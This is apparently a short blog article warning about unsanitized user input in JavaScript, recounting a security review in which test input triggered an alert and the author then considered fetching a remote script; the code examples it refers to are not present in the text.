Un-sanitized User Input In Your JavaScript Is Dangerous
Disclaimer: The following statements are mine, and do not relate to my employer or any of their or my clients. This article is based on a real story, but the details have been changed to protect the original source.
As software engineers we often have a hundred things to consider aside from the code we are writing, be it testing, servers, or deployment. One area that can be easily overlooked is security. I came across the following gem one day when assisting in a security review of an application.
The application in question accepted user input, and at some point in the process would take this input and do some type of concatenation or processing with it into a variable. The security testing team reported a finding and I was asked what the following code would do.
Interestingly enough it will alert! I hadn’t seen that one before. So my next though was, could I do something more sinister, like fetch a remote script or data. So I tried this next.
